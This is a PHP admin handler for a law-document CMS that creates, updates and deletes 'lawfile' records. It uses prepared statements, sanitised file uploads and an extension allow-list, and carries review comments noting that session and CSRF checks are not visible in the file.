Viewing: managelawfile.php
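<?php
include_once("../layouts/header.php");
include_once("../layouts/validate.php");

// Admin-side handlers for the `lawfile` table: create, edit-redirect, update and delete.
//
// NOTE(review): no session, role or CSRF check is visible in this file. Presumably
// ../layouts/header.php enforces an authenticated admin session — confirm, and add
// CSRF tokens to the create/update/delete forms.

if (!function_exists('lawfile_field')) {
    /**
     * Read one scalar form field as a string.
     *
     * @param array  $data Submitted form data (normally $_POST).
     * @param string $key  Field name.
     * @return string The field value, or '' when it is missing or not a scalar.
     */
    function lawfile_field($data, $key)
    {
        return (is_array($data) && isset($data[$key]) && is_scalar($data[$key])) ? (string) $data[$key] : '';
    }
}

if (!function_exists('lawfile_store_upload')) {
    /**
     * Validate one $_FILES entry and move it into $dir under a sanitised name.
     *
     * The client-supplied name is attacker-controlled. Using it verbatim lets a
     * request choose the extension (and so the server-side handler) and the
     * directory of the stored file, so it is reduced to "<safe stem>.<allowed ext>".
     *
     * @param array  $file One entry of $_FILES.
     * @param string $dir  Target directory, with a trailing slash.
     * @return string The stored file name, or '' when the upload was rejected.
     */
    function lawfile_store_upload($file, $dir)
    {
        // NOTE(review): assumed set of document types for this CMS — confirm and trim.
        $allowed = ['pdf', 'doc', 'docx', 'xls', 'xlsx', 'txt', 'jpg', 'jpeg', 'png'];

        if (!is_array($file) || !isset($file['name'], $file['tmp_name'], $file['error'])) {
            return '';
        }
        // Array-valued entries (multi-file fields) and failed uploads are rejected.
        if (!is_string($file['name']) || !is_string($file['tmp_name']) || $file['error'] !== UPLOAD_ERR_OK) {
            return '';
        }

        // Drop any directory component, whichever separator the client used.
        $base = basename(str_replace('\\', '/', $file['name']));
        $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));

        // Dots inside the stem are replaced too, so "a.php.pdf" is stored as "a_php.pdf".
        $stem = preg_replace('/[^\p{L}\p{N}_ -]+/u', '_', pathinfo($base, PATHINFO_FILENAME));
        if (!is_string($stem)) {
            return ''; // name was not valid UTF-8
        }
        $stem = trim($stem);

        if ($stem === '' || !in_array($ext, $allowed, true)) {
            return '';
        }
        if (!is_uploaded_file($file['tmp_name'])) {
            return '';
        }

        $name = $stem . '.' . $ext;

        // An existing file with the same name is overwritten, as before.
        // The target directory should also have script execution disabled in the
        // web-server configuration, as a second layer.
        return move_uploaded_file($file['tmp_name'], $dir . $name) ? $name : '';
    }
}

if (isset($_POST['submit'])) {
    /**
     * Store the uploaded file and insert a new `lawfile` row, then redirect to the list page.
     *
     * @param mysqli $conn Open database connection.
     * @param array  $data Submitted form data; reads 'title', 'name' and 'category'.
     * @return void
     */
    function create($conn, $data = [])
    {
        // Values are bound as statement parameters below, so they are not SQL-escaped here.
        $title = validate_script(lawfile_field($data, 'title'));
        $name = validate_script(lawfile_field($data, 'name'));
        $category = validate_script(lawfile_field($data, 'category'));
        $isValidTitle = validate_title($title);
        $isValidName = validate_name($name);

        $file_name = '';
        if ($isValidName && $isValidTitle && isset($_FILES['file'])) {
            $file_name = lawfile_store_upload($_FILES['file'], "files/");
        }

        if ($file_name !== '') {
            // NOTE(review): 'y' is a two-digit year; kept so new rows match existing ones — confirm.
            $date = date('y-m-d');
            $res = false;
            $stmt = mysqli_prepare($conn, "INSERT INTO lawfile(title,files,category,cdate,name) VALUES(?,?,?,?,?)");
            if ($stmt) {
                mysqli_stmt_bind_param($stmt, 'sssss', $title, $file_name, $category, $date, $name);
                $res = mysqli_stmt_execute($stmt);
                mysqli_stmt_close($stmt);
            }
            if ($res) {
                $_SESSION['statuslaw'] = "Data Added Sucessfully";
            }
        } else {
            $_SESSION['statuslawError'] = "Sorry, Something went wrong, data can not be added into the database.";
        }
        header("location: showlawfile.php");
    }

    create($conn, $_POST);
    exit; // stop after the redirect so no later handler runs on the same request
}

if (isset($_GET['editid'])) {
    // The id ends up in a URL, so it is URL-encoded rather than SQL-escaped.
    $id = is_scalar($_GET['editid']) ? rawurlencode((string) $_GET['editid']) : '';

    /**
     * Redirect to the edit form for one record.
     *
     * @param string $id Record id, already URL-encoded.
     * @return void
     */
    function edit($id)
    {
        header("location: " . ADMINURL . "lawfiles/editlawfile.php?updateid=$id");
    }

    edit($id);
    exit;
}

/**
 * Fetch one `lawfile` row by id.
 *
 * @param mysqli     $conn Open database connection.
 * @param int|string $id   Record id.
 * @return array|null The row as an associative array, or null when no row matches.
 */
function previousdata($conn, $id)
{
    // Escaped inside the function so it is safe whatever the caller passes.
    // mysqli_query is kept here because reading a `SELECT *` result from a prepared
    // statement needs mysqli_stmt_get_result(), which exists only with mysqlnd.
    $safeId = mysqli_real_escape_string($conn, (string) $id);
    $res = mysqli_query($conn, "SELECT * FROM lawfile WHERE id='$safeId'");
    if ($res && mysqli_num_rows($res) > 0) {
        return mysqli_fetch_assoc($res);
    }
    return null;
}

/**
 * Update one `lawfile` row, optionally replacing its file, then redirect via script.
 *
 * When no new file is submitted, the file already recorded for the row is kept,
 * provided it still exists on disk.
 *
 * @param mysqli     $conn Open database connection.
 * @param int|string $id   Record id.
 * @param array      $data Submitted form data; reads 'title', 'name' and 'category'.
 * @return void
 */
function update($conn, $id, $data = [])
{
    $title = validate_script(lawfile_field($data, 'title'));
    $name = validate_script(lawfile_field($data, 'name'));
    $category = validate_script(lawfile_field($data, 'category'));
    $isValidTitle = validate_title($title);
    $isValidName = validate_name($name);

    $path = "files/";
    $previous = previousdata($conn, $id);
    $pre_file = (is_array($previous) && isset($previous['files'])) ? (string) $previous['files'] : '';

    $upload = isset($_FILES['file']) ? $_FILES['file'] : null;
    $hasNewFile = is_array($upload) && isset($upload['name']) && $upload['name'] != "";

    $file_name = '';
    if ($hasNewFile) {
        $file_name = lawfile_store_upload($upload, $path);
    } elseif ($pre_file !== '' && is_file($path . $pre_file)) {
        // is_file() rather than file_exists(): an empty previous name must not match the directory itself.
        $file_name = $pre_file;
    } else {
        $_SESSION['filesError'] = "Please select a files.";
    }

    if ($isValidName && $isValidTitle && $file_name !== '') {
        $udate = date('y-m-d');
        $res = false;
        $stmt = mysqli_prepare($conn, "UPDATE lawfile SET title = ?, files = ?, category = ?, udate = ?, name = ? WHERE id = ?");
        if ($stmt) {
            $rowId = (string) $id;
            mysqli_stmt_bind_param($stmt, 'ssssss', $title, $file_name, $category, $udate, $name, $rowId);
            $res = mysqli_stmt_execute($stmt);
            mysqli_stmt_close($stmt);
        }
        if ($res) {
            $_SESSION['statuslaw'] = "Data Updated Sucessfully";
        }
    } else {
        $_SESSION['statuslawError'] = "Sorry, Something went wrong, data can not be added into the database.";
    }

    // Both outcomes return to the list page with a script redirect rather than header().
    $path = "location.href='" . ADMINURL . "lawfiles/showlawfile.php'";
    echo "<script>$path</script>";
}

if (isset($_POST['delete_btn'])) {
    // Responds with 6 on success and 5 on failure.
    // NOTE(review): only the database row is deleted; the stored file stays in files/.
    $id = (isset($_POST['deleteid']) && is_scalar($_POST['deleteid'])) ? (string) $_POST['deleteid'] : '';
    $res = false;
    $stmt = mysqli_prepare($conn, "DELETE FROM lawfile WHERE id = ?");
    if ($stmt) {
        mysqli_stmt_bind_param($stmt, 's', $id);
        $res = mysqli_stmt_execute($stmt);
        mysqli_stmt_close($stmt);
    }
    echo $res ? 6 : 5;
}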